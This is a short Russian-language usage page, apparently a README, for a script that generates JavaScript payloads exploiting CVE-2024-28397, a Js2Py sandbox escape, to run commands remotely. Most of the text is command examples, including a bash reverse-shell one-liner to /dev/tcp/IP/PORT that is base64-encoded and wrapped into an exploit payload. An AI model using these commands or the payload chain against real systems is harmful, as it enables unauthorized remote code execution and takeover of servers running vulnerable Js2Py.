
Генерирует JavaScript-полезные нагрузки для эксплуатации CVE-2024-28397 (побег из песочницы Js2Py), обеспечивая удаленное выполнение команд и получение обратных оболочек через раскрытие внутренних компонентов Python.
Этот скрипт генерирует JavaScript-нагрузку, которая может быть выполнена с помощью Js2Py в уязвимых средах, где внутренние компоненты Python доступны через обёртки объектов.
Базовая команда выполнения:
python3 cve-2024-28397.py -c "id"
Генерация компактной однострочной нагрузки:
python3 cve-2024-28397.py -c "whoami" --compact
Сгенерируйте Base64-нагрузку:
echo 'bash -i >& /dev/tcp/IP/PORT 0>&1' | base64 -w0
Сгенерируйте полезную нагрузку для Js2Py:
python3 cve-2024-28397.py -c "bash -c 'echo BASE64_OUTPUT | base64 -d | bash'" --compact
Замените BASE64_OUTPUT на строку Base64, полученную на первом шаге.